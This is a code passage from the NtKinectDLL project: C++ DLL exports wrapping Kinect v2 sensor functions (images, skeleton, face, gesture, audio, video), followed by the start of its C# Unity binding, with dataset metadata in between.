void* getKinect(void) {\r\n NtKinect* kinect = new NtKinect();\r\n return static_cast<void*>(kinect);\r\n }\r\n NTKINECTDLL_API void stopKinect(void* ptr) {\r\n cv::destroyAllWindows();\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n delete kinect;\r\n }\r\n\r\n // OpenCV\r\n NTKINECTDLL_API void imshow(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n int scale = 4;\r\n cv::Mat img((*kinect).rgbImage);\r\n cv::resize(img, img, cv::Size(img.cols / scale, img.rows / scale), 0, 0);\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tif (joint.TrackingState == TrackingState_NotTracked) continue;\r\n\tColorSpacePoint cp;\r\n\t(*kinect).coordinateMapper->MapCameraPointToColorSpace(joint.Position, &cp);\r\n\tcv::rectangle(img, cv::Rect((int)cp.X / scale - 2, (int)cp.Y / scale - 2, 4, 4), cv::Scalar(0, 0, 255), 2);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(255, 255, 0), 2);\r\n }\r\n cv::imshow(\"face\", img);\r\n cv::waitKey(1);\r\n }\r\n\r\n vector<cv::Rect> savedRect;\r\n NTKINECTDLL_API void imshowBlack(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n int scale = 4;\r\n cv::Mat img((*kinect).rgbImage);\r\n cv::resize(img, img, cv::Size(img.cols / scale, img.rows / scale), 0, 0);\r\n if ((*kinect).faceRect.size() == 0) {\r\n for (auto& r : savedRect) {\r\n\t(*kinect).faceRect.push_back(r);\r\n }\r\n }\r\n else {\r\n savedRect.clear();\r\n for (auto& r : (*kinect).faceRect) {\r\n\tsavedRect.push_back(r);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(0, 0, 0), -1);\r\n }\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tif (joint.TrackingState == TrackingState_NotTracked) continue;\r\n\tColorSpacePoint cp;\r\n\t(*kinect).coordinateMapper->MapCameraPointToColorSpace(joint.Position, &cp);\r\n\tcv::rectangle(img, cv::Rect((int)cp.X / scale - 2, (int)cp.Y / scale - 2, 4, 4), cv::Scalar(0, 0, 255), 2);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(255, 255, 0), 2);\r\n }\r\n cv::imshow(\"face\", img);\r\n cv::waitKey(1);\r\n }\r\n\r\n // CoordinateMapper\r\n /*\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr,void* sv,void* cv) {\r\n NtKinect* kinect = 
static_cast<NtKinect*>(ptr);\r\n CameraSpacePoint sp; sp.X = ((float*)sv)[0]; sp.Y = ((float*)sv)[1]; sp.Z = ((float*)sv)[2];\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapCameraPointToColorSpace(sp,&cp);\r\n ((float*)cv)[0] = cp.X; ((float*)cv)[1] = cp.Y;\r\n }\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr,void* sv,void* dv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n CameraSpacePoint sp; sp.X = ((float*)sv)[0]; sp.Y = ((float*)sv)[1]; sp.Z = ((float*)sv)[2];\r\n DepthSpacePoint dp;\r\n (*kinect).coordinateMapper->MapCameraPointToDepthSpace(sp,&dp);\r\n ((float*)dv)[0] = dp.X; ((float*)dv)[1] = dp.Y;\r\n }\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr,void* dv,UINT16 depth,void* cv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n DepthSpacePoint dp; dp.X = ((float*)dv)[0]; dp.Y = ((float*)dv)[1];\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapDepthPointToColorSpace(dp,depth,&cp);\r\n ((float*)cv)[0] = cp.X; ((float*)cv)[1] = cp.Y;\r\n }\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr,void* dv,UINT16 depth,void* sv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n DepthSpacePoint dp; dp.X = ((float*)dv)[0]; dp.Y = ((float*)dv)[1];\r\n CameraSpacePoint sp;\r\n (*kinect).coordinateMapper->MapDepthPointToCameraSpace(dp,depth,&sp);\r\n ((float*)sv)[0] = sp.X; ((float*)sv)[1] = sp.Y; ((float*)sv)[2] = sp.Z;\r\n }\r\n */\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr, void* sv, void* cv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* sa = (float*)sv;\r\n float* ca = (float*)cv;\r\n for (int i = 0; i<n; i++) {\r\n CameraSpacePoint sp; sp.X = *sa++; sp.Y = *sa++; sp.Z = *sa++;\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapCameraPointToColorSpace(sp, &cp);\r\n *ca++ = cp.X; *ca++ = cp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr, void* sv, void* dv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* sa = (float*)sv;\r\n float* da = (float*)dv;\r\n for (int i = 0; i<n; i++) {\r\n CameraSpacePoint sp; sp.X = *sa++; sp.Y = *sa++; sp.Z = *sa++;\r\n DepthSpacePoint dp;\r\n (*kinect).coordinateMapper->MapCameraPointToDepthSpace(sp, &dp);\r\n *da++ = dp.X; *da++ = dp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr, void* dv, void* dth, void* cv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* da = (float*)dv;\r\n UINT16* dth_addr = (UINT16*)dth;\r\n float* ca = (float*)cv;\r\n for (int i = 0; i<n; i++) {\r\n DepthSpacePoint dp; dp.X = *da++; dp.Y = *da++;\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapDepthPointToColorSpace(dp, *dth_addr++, &cp);\r\n *ca++ = cp.X; *ca++ = cp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr, void* dv, void* dth, void* sv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* da = (float*)dv;\r\n UINT16* dth_addr = (UINT16*)dth;\r\n float* sa = (float*)sv;\r\n for (int i = 0; i<n; i++) {\r\n DepthSpacePoint dp; dp.X = *da++; dp.Y = *da++;\r\n CameraSpacePoint sp;\r\n (*kinect).coordinateMapper->MapDepthPointToCameraSpace(dp, *dth_addr++, &sp);\r\n *sa++ = sp.X; *sa++ = sp.Y; *sa++ = sp.Z;\r\n }\r\n }\r\n\r\n // Multi Thread\r\n NTKINECTDLL_API void acquire(void* ptr) { (*static_cast<NtKinect*>(ptr)).acquire(); }\r\n NTKINECTDLL_API void release(void* ptr) { (*static_cast<NtKinect*>(ptr)).release(); }\r\n\r\n // Audio\r\n NTKINECTDLL_API void setAudio(void* ptr, 
bool flag) { (*static_cast<NtKinect*>(ptr)).setAudio(flag); }\r\n NTKINECTDLL_API float getBeamAngle(void* ptr) { return (*static_cast<NtKinect*>(ptr)).beamAngle; }\r\n NTKINECTDLL_API float getBeamAngleConfidence(void* ptr) { return (*static_cast<NtKinect*>(ptr)).beamAngleConfidence; }\r\n NTKINECTDLL_API unsigned __int64 getAudioTrackingId(void* ptr) { return (*static_cast<NtKinect*>(ptr)).audioTrackingId; }\r\n NTKINECTDLL_API void openAudio(void* ptr, wchar_t* filename) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n (*kinect).openAudio(wchar2string(filename));\r\n }\r\n NTKINECTDLL_API void closeAudio(void* ptr) { (*static_cast<NtKinect*>(ptr)).closeAudio(); }\r\n NTKINECTDLL_API bool isOpenedAudio(void* ptr) { return (*static_cast<NtKinect*>(ptr)).isOpenedAudio(); }\r\n\r\n // RGB\r\n NTKINECTDLL_API void setRGB(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n (*kinect).setRGB();\r\n }\r\n NTKINECTDLL_API int getRGB(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n char* idx = (char*)data;\r\n for (int y = 0; y<(*kinect).rgbImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).rgbImage.cols; x++) {\r\n\tcv::Vec4b& pxl = (*kinect).rgbImage.at<cv::Vec4b>(y, x);\r\n\t*idx++ = pxl[2]; // Red\r\n\t*idx++ = pxl[1]; // Green\r\n\t*idx++ = pxl[0]; // Blue\r\n\t*idx++ = pxl[3]; // Alpha\r\n }\r\n }\r\n return (int)(idx - (char*)data);\r\n }\r\n\r\n // Depth\r\n NTKINECTDLL_API void setDepth(void* ptr) { (*static_cast<NtKinect*>(ptr)).setDepth(); }\r\n NTKINECTDLL_API int getDepth(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT16* idx = (UINT16*)data;\r\n for (int y = 0; y<(*kinect).depthImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).depthImage.cols; x++) {\r\n\t*idx++ = (*kinect).depthImage.at<UINT16>(y, x);\r\n }\r\n }\r\n return (int)(idx - (UINT16*)data);\r\n }\r\n\r\n // Infrared\r\n NTKINECTDLL_API void setInfrared(void* ptr) { (*static_cast<NtKinect*>(ptr)).setInfrared(); }\r\n NTKINECTDLL_API int getInfrared(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT16* idx = (UINT16*)data;\r\n for (int y = 0; y<(*kinect).infraredImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).infraredImage.cols; x++) {\r\n\t*idx++ = (*kinect).infraredImage.at<UINT16>(y, x);\r\n }\r\n }\r\n return (int)(idx - (UINT16*)data);\r\n }\r\n\r\n // bodyIndex\r\n NTKINECTDLL_API void setBodyIndex(void* ptr) { (*static_cast<NtKinect*>(ptr)).setBodyIndex(); }\r\n NTKINECTDLL_API int getBodyIndex(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n char* idx = (char*)data;\r\n for (int y = 0; y<(*kinect).bodyIndexImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).bodyIndexImage.cols; x++) {\r\n\t*idx++ = (*kinect).bodyIndexImage.at<char>(y, x);\r\n }\r\n }\r\n return (int)(idx - (char*)data);\r\n }\r\n\r\n // Skeleton\r\n NTKINECTDLL_API void setSkeleton(void* ptr) { (*static_cast<NtKinect*>(ptr)).setSkeleton(); }\r\n NTKINECTDLL_API int getSkeleton(void* ptr, void* skel, void* skelState, void* skelId, void* skelTrackingId) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* skeleton = (float*)skel;\r\n int* state = (int*)skelState;\r\n int* id = (int*)skelId;\r\n UINT64* trackingId = (UINT64*)skelTrackingId;\r\n int idx = 0, jt = 0, st = 0;\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tskeleton[jt++] = joint.Position.X;\r\n\tskeleton[jt++] = joint.Position.Y;\r\n\tskeleton[jt++] = 
joint.Position.Z;\r\n\tstate[st++] = joint.TrackingState;\r\n }\r\n id[idx] = (*kinect).skeletonId[idx];\r\n trackingId[idx] = (*kinect).skeletonTrackingId[idx];\r\n idx++;\r\n }\r\n return idx;\r\n }\r\n NTKINECTDLL_API int handState(void* ptr, int id, bool isLeft) { return (*static_cast<NtKinect*>(ptr)).handState(id, isLeft).first; }\r\n\r\n // Face\r\n NTKINECTDLL_API void setFace(void* ptr, bool isColorSpace) { (*static_cast<NtKinect*>(ptr)).setFace(isColorSpace); }\r\n NTKINECTDLL_API int getFace(void* ptr, float* point, float* rect, float* direction, int* property, void* tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* p = point;\r\n for (auto& face : (*kinect).facePoint) {\r\n for (auto& pt : face) {\r\n\t*p++ = pt.X;\r\n\t*p++ = pt.Y;\r\n }\r\n }\r\n int np = (int)(p - point) / 2;\r\n p = rect;\r\n for (auto& r : (*kinect).faceRect) {\r\n *p++ = (float)r.x;\r\n *p++ = (float)r.y;\r\n *p++ = (float)r.width;\r\n *p++ = (float)r.height;\r\n }\r\n int nr = (int)(p - rect) / 4;\r\n p = direction;\r\n for (auto& d : (*kinect).faceDirection) {\r\n *p++ = d[0];\r\n *p++ = d[1];\r\n *p++ = d[2];\r\n }\r\n int nd = (int)(p - direction) / 3;\r\n int* a = (int*)property;\r\n for (auto& face : (*kinect).faceProperty) {\r\n for (auto& prop : face) {\r\n\t*a++ = prop;\r\n }\r\n }\r\n int npr = (int)(a - property);\r\n UINT64* q = (UINT64*)tid;\r\n for (auto& t : (*kinect).faceTrackingId) {\r\n *q++ = t;\r\n }\r\n int nt = (int)(q - (UINT64*)tid);\r\n return min(nt, min(min(npr, nd), min(nr, np)));\r\n }\r\n\r\n // HDFace\r\n NTKINECTDLL_API void setHDFace(void* ptr) { (*static_cast<NtKinect*>(ptr)).setHDFace(); }\r\n NTKINECTDLL_API int getHDFace(void* ptr, float* point, void* tid, int* status) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float *p = (float*)point;\r\n for (auto& person : (*kinect).hdfaceVertices) {\r\n for (auto& cp : person) {\r\n\t*p++ = cp.X;\r\n\t*p++ = cp.Y;\r\n\t*p++ = cp.Z;\r\n }\r\n }\r\n UINT64 *q = (UINT64*)tid;\r\n for (auto& t : (*kinect).hdfaceTrackingId) {\r\n *q++ = t;\r\n }\r\n int* r = (int*)status;\r\n for (auto& s : (*kinect).hdfaceStatus) {\r\n *r++ = s.first;\r\n *r++ = s.second;\r\n }\r\n return (int)(*kinect).hdfaceVertices.size();\r\n }\r\n\r\n // Gesture\r\n NTKINECTDLL_API void setGestureFile(void* ptr, wchar_t* filename) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n wstring fname(filename);\r\n (*kinect).setGestureFile(fname);\r\n }\r\n\r\n NTKINECTDLL_API int setGestureId(void* ptr, wchar_t* name, int id) {\r\n int len = WideCharToMultiByte(CP_UTF8, NULL, name, -1, NULL, 0, NULL, NULL) + 1;\r\n char* nameBuffer = new char[len];\r\n memset(nameBuffer, '\\0', len);\r\n WideCharToMultiByte(CP_UTF8, NULL, name, -1, nameBuffer, len, NULL, NULL);\r\n string s(nameBuffer);\r\n gidMap[s] = id;\r\n\r\n return id;\r\n }\r\n\r\n NTKINECTDLL_API void setGesture(void* ptr) { (*static_cast<NtKinect*>(ptr)).setGesture(); }\r\n\r\n NTKINECTDLL_API int getDiscreteGesture(void* ptr, int* gid, float* confidence, void *tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT64* trackingId = (UINT64*)tid;\r\n for (int i = 0; i<(*kinect).discreteGesture.size(); i++) {\r\n auto g = (*kinect).discreteGesture[i];\r\n string gname = (*kinect).gesture2string(g.first);\r\n gid[i] = gidMap[gname];\r\n confidence[i] = g.second;\r\n trackingId[i] = (*kinect).discreteGestureTrackingId[i];\r\n }\r\n return (int)(*kinect).discreteGesture.size();\r\n }\r\n\r\n NTKINECTDLL_API int getContinuousGesture(void* ptr, int* gid, float* 
progress, void *tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT64* trackingId = (UINT64*)tid;\r\n for (int i = 0; i<(*kinect).continuousGesture.size(); i++) {\r\n auto g = (*kinect).continuousGesture[i];\r\n string gname = (*kinect).gesture2string(g.first);\r\n gid[i] = gidMap[gname];\r\n progress[i] = g.second;\r\n trackingId[i] = (*kinect).continuousGestureTrackingId[i];\r\n }\r\n return (int)(*kinect).continuousGesture.size();\r\n }\r\n NTKINECTDLL_API int getGidMapSize() {\r\n return (int)gidMap.size();\r\n }\r\n\r\n // Video\r\n cv::VideoWriter *videoWriter = nullptr;\r\n cv::Size videoSize;\r\n bool videoOnSave = false;\r\n\r\n NTKINECTDLL_API void openVideo(void* ptr, wchar_t* filename) {\r\n NtKinect *kinect = static_cast<NtKinect*>(ptr);\r\n string fname = wchar2string(filename);\r\n if (videoOnSave) {\r\n std::cerr << \"cannot open two video files simultaneously\" << std::endl;\r\n return;\r\n }\r\n videoSize = cv::Size(1920 / 4, 1080 / 4);\r\n videoWriter = new cv::VideoWriter(fname, cv::VideoWriter::fourcc('X', 'V', 'I', 'D'), 30.0, videoSize);\r\n if (!(*videoWriter).isOpened()) {\r\n std::cerr << \"cannot open video file\" << std::endl;\r\n return;\r\n }\r\n videoOnSave = true;\r\n }\r\n NTKINECTDLL_API void writeVideo(void* ptr) {\r\n NtKinect *kinect = static_cast<NtKinect*>(ptr);\r\n cv::Mat img;\r\n if (videoOnSave) {\r\n cv::resize((*kinect).rgbImage, img, videoSize, 0, 0);\r\n cv::cvtColor(img, img, cv::COLOR_BGRA2BGR);\r\n (*videoWriter) << img;\r\n }\r\n }\r\n NTKINECTDLL_API void closeVideo(void* ptr) {\r\n if (videoOnSave) {\r\n (*videoWriter).release();\r\n delete videoWriter;\r\n videoWriter = nullptr;\r\n videoOnSave = false;\r\n }\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.6649125814437866,
"alphanum_fraction": 0.6761813759803772,
"avg_line_length": 39.63282775878906,
"blob_id": "240faa31856805d02fcb983202fb1f91d3e29797",
"content_id": "2b9cb23c6b89a2764cae879210eab5d6cc5f7f46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C#",
"length_bytes": 37628,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 926,
"path": "/NtUnity/NtUnity.cs",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017 Yoshihisa Nitta\n * Released under the MIT license\n * http://opensource.org/licenses/mit-license.php\n */\n\n/*\n * NtUnity.cs version 1.2 2017/10/05\n * http://nw.tsuda.ac.jp/NtKinectDLL/\n *\n * requires:\n * NtKinectDLL version 1.2.4 or later\n */\n\n\nusing System.Collections;\nusing System.Collections.Generic;\nusing UnityEngine;\nusing System;\nusing System.Runtime.InteropServices;\n\nnamespace NtUnity {\n public class Kinect {\n public const int\n // Number\n bodyCount = 6,\n jointCount = 25,\n rgbCols = 1920,\n rgbRows = 1080,\n depthCols = 512,\n depthRows = 424,\n // JointType\n JointType_SpineBase= 0,\n JointType_SpineMid= 1,\n JointType_Neck= 2,\n JointType_Head= 3,\n JointType_ShoulderLeft= 4,\n JointType_ElbowLeft= 5,\n JointType_WristLeft= 6,\n JointType_HandLeft= 7,\n JointType_ShoulderRight= 8,\n JointType_ElbowRight= 9,\n JointType_WristRight= 10,\n JointType_HandRight= 11,\n JointType_HipLeft= 12,\n JointType_KneeLeft= 13,\n JointType_AnkleLeft= 14,\n JointType_FootLeft= 15,\n JointType_HipRight= 16,\n JointType_KneeRight= 17,\n JointType_AnkleRight= 18,\n JointType_FootRight= 19,\n JointType_SpineShoulder= 20,\n JointType_HandTipLeft= 21,\n JointType_ThumbLeft= 22,\n JointType_HandTipRight= 23,\n JointType_ThumbRight= 24,\n // TrackingState\n TrackingState_NotTracked= 0,\n TrackingState_Inferred= 1,\n TrackingState_Tracked= 2,\n // FacePoint\n FacePointType_None= -1,\n FacePointType_EyeLeft= 0,\n FacePointType_EyeRight= 1,\n FacePointType_Nose= 2,\n FacePointType_MouthCornerLeft= 3,\n FacePointType_MouthCornerRight= 4,\n FacePointType_Count= ( FacePointType_MouthCornerRight + 1 ) ,\n // a_FaceProperty\n FaceProperty_Happy= 0,\n FaceProperty_Engaged= 1,\n FaceProperty_WearingGlasses= 2,\n FaceProperty_LeftEyeClosed= 3,\n FaceProperty_RightEyeClosed= 4,\n FaceProperty_MouthOpen= 5,\n FaceProperty_MouthMoved= 6,\n FaceProperty_LookingAway= 7,\n FaceProperty_Count= ( FaceProperty_LookingAway + 1 ) ,\n // FaceDetectionResult\n DetectionResult_Unknown= 0,\n DetectionResult_No= 1,\n DetectionResult_Maybe= 2,\n DetectionResult_Yes= 3,\n // HDFace\n HDFaceVerticesSize = 1347,\n // dummy\n NtKinectdummy = 0;\n\n [DllImport (\"NtKinectDLL\")] private static extern IntPtr getKinect();\n [DllImport (\"NtKinectDLL\")] private static extern void stopKinect(IntPtr ptr);\n\n // OpenCV\n [DllImport (\"NtKinectDLL\")] private static extern void imshow(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void imshowBlack(IntPtr ptr);\n\n // CoordinateMapper\n [DllImport (\"NtKinectDLL\")] private static extern void mapCameraPointToColorSpace(IntPtr ptr,IntPtr sv,IntPtr cv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapCameraPointToDepthSpace(IntPtr ptr,IntPtr sv,IntPtr dv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapDepthPointToColorSpace(IntPtr ptr,IntPtr dv,IntPtr dth,IntPtr cv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapDepthPointToCameraSpace(IntPtr ptr,IntPtr dv,IntPtr dth,IntPtr sv,int n);\n\n // Multi Thread\n [DllImport (\"NtKinectDLL\")] private static extern void acquire(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void release(IntPtr ptr);\n\n // Audio\n [DllImport (\"NtKinectDLL\")] private static extern void setAudio(IntPtr ptr, bool flag);\n [DllImport (\"NtKinectDLL\")] private static extern float getBeamAngle(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern float getBeamAngleConfidence(IntPtr ptr);\n [DllImport 
(\"NtKinectDLL\")] private static extern ulong getAudioTrackingId(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void openAudio(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern void closeAudio(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern bool isOpenedAudio(IntPtr ptr);\n\n // RGB\n [DllImport (\"NtKinectDLL\")] private static extern void setRGB(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getRGB(IntPtr ptr, IntPtr data);\n\n // Depth\n [DllImport (\"NtKinectDLL\")] private static extern void setDepth(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getDepth(IntPtr ptr, IntPtr data);\n\n // Infrared\n [DllImport (\"NtKinectDLL\")] private static extern void setInfrared(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getInfrared(IntPtr ptr, IntPtr data);\n\n // BodyIndex\n [DllImport (\"NtKinectDLL\")] private static extern void setBodyIndex(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getBodyIndex(IntPtr ptr, IntPtr data);\n \n // Skeleton\n [DllImport (\"NtKinectDLL\")] private static extern void setSkeleton(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getSkeleton(IntPtr ptr, IntPtr skelton, IntPtr state, IntPtr id, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int handState(IntPtr ptr,int id,bool isLeft);\n \n // Face\n [DllImport (\"NtKinectDLL\")] private static extern void setFace(IntPtr ptr, bool isColorSpace);\n [DllImport (\"NtKinectDLL\")] private static extern int getFace(IntPtr ptr, IntPtr point,IntPtr rect,IntPtr direction,IntPtr property,IntPtr tid);\n\n // HDFace\n [DllImport (\"NtKinectDLL\")] private static extern void setHDFace(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getHDFace(IntPtr ptr, IntPtr point, IntPtr tid, IntPtr status);\n \n // Gesture\n [DllImport (\"NtKinectDLL\")] private static extern void setGestureFile(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern int setGestureId(IntPtr ptr, IntPtr name, int id); // id: non-zero\n [DllImport (\"NtKinectDLL\")] private static extern void setGesture(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getDiscreteGesture(IntPtr ptr, IntPtr gid, IntPtr confidence, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int getContinuousGesture(IntPtr ptr, IntPtr gid, IntPtr progress, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int getGidMapSize();\n\n // Video\n [DllImport (\"NtKinectDLL\")] private static extern void openVideo(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern void writeVideo(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void closeVideo(IntPtr ptr);\n \n private IntPtr kinect;\n //public Vector3[] joint = new Vector3[jointCount];\n //public int[] jointState = new int[jointCount];\n\n // audio\n public float beamAngle;\n public float beamAngleConfidence;\n public ulong audioTrackingId;\n // images\n public Color32[] rgbImage;\n public ushort[] depthImage;\n public ushort[] infraredImage;\n public byte[] bodyIndexImage;\n // skeleton\n public List<List<Vector3>> skeleton;\n public List<List<int>> skeletonState;\n public List<int> skeletonId;\n public List<ulong> skeletonTrackingId;\n // skeleton (internal)\n private float[] skel;\n private int[] skelState;\n private int[] skelId;\n private ulong[] skelTrackingId;\n // 
face\n public List<List<Vector2>> facePoint;\n public List<Vector4> faceRect;\n public List<Vector3> faceDirection;\n public List<List<int>> faceProperty;\n public List<ulong> faceTrackingId;\n // face (internal)\n private float[] fcPoint;\n private float[] fcRect;\n private float[] fcDirection;\n private int[] fcProperty;\n private ulong[] fcTrackingId;\n // hdface\n public List<List<Vector3>> hdfacePoint;\n public List<ulong> hdfaceTrackingId;\n public List<int> hdfaceStatus;\n // hdface (internal)\n private float[] hdfcPoint;\n private ulong[] hdfcTrackingId;\n private int[] hdfcStatus;\n // gesture\n public List<int> discreteGesture;\n public List<float> gestureConfidence;\n public List<ulong> discreteGestureTrackingId;\n public List<int> continuousGesture;\n public List<float> gestureProgress;\n public List<ulong> continuousGestureTrackingId;\n // gesture (internal)\n private int[] gstId;\n private float[] gstFloat;\n private ulong[] gstTrackingId;\n \n public Kinect() {\n kinect = getKinect();\n //rgbImage = new byte[rgbRows * rgbCols * 4];\n rgbImage = new Color32[rgbRows * rgbCols];\n depthImage = new ushort[depthRows * depthCols];\n infraredImage = new ushort[depthRows * depthCols];\n bodyIndexImage = new byte[depthRows * depthCols];\n skeleton = new List<List<Vector3>>();\n skeletonState = new List<List<int>>();\n skeletonId = new List<int>();\n skeletonTrackingId = new List<ulong>();\n skel = new float[bodyCount * jointCount * 3];\n skelState = new int[bodyCount * jointCount];\n skelId = new int[bodyCount];\n skelTrackingId = new ulong[bodyCount];\n facePoint = new List<List<Vector2>>();\n faceRect = new List<Vector4>();\n faceDirection = new List<Vector3>();\n faceProperty = new List<List<int>>();\n faceTrackingId = new List<ulong>();\n fcPoint = new float[bodyCount * FacePointType_Count * 3];\n fcRect = new float[bodyCount * 4];\n fcDirection = new float[bodyCount * 3];\n fcProperty = new int[bodyCount * FaceProperty_Count];\n fcTrackingId = new ulong[bodyCount];\n hdfacePoint = new List<List<Vector3>>();\n hdfaceTrackingId = new List<ulong>();\n hdfaceStatus = new List<int>();\n hdfcPoint = new float[bodyCount * HDFaceVerticesSize * 3];\n hdfcTrackingId = new ulong[bodyCount];\n hdfcStatus = new int[bodyCount * 2];\n discreteGesture = new List<int>();\n gestureConfidence = new List<float>();\n discreteGestureTrackingId = new List<ulong>();\n continuousGesture = new List<int>();\n gestureProgress = new List<float>();\n continuousGestureTrackingId = new List<ulong>();\n gstId = new int[bodyCount * 100];\n gstFloat = new float[bodyCount * 100];\n gstTrackingId = new ulong[bodyCount * 100];\n }\n public void stopKinect() { stopKinect(kinect); }\n\n // OpenCV\n public void imshow() { imshow(kinect); }\n public void imshowBlack() { imshowBlack(kinect); }\n \n // coordinateMapper\n public void mapCameraPointToColorSpace(List<Vector3> skel,ref List<Vector2> color,int n) {\n float[] sv = new float[n * 3];\n float[] cv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tsv[3*i] = skel[i].x; sv[3*i+1] = skel[i].y; sv[3*i+2] = skel[i].z;\n }\n GCHandle gch = GCHandle.Alloc(sv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(cv,GCHandleType.Pinned);\n mapCameraPointToColorSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),n);\n gch.Free();\n gch2.Free();\n color.Clear();\n for (int i=0; i<n; i++) {\n\tcolor.Add(new Vector2(cv[2*i],cv[2*i+1]));\n }\n }\n public void mapCameraPointToDepthSpace(List<Vector3> skel, ref List<Vector2> depth, int n) {\n float[] sv = new float[n 
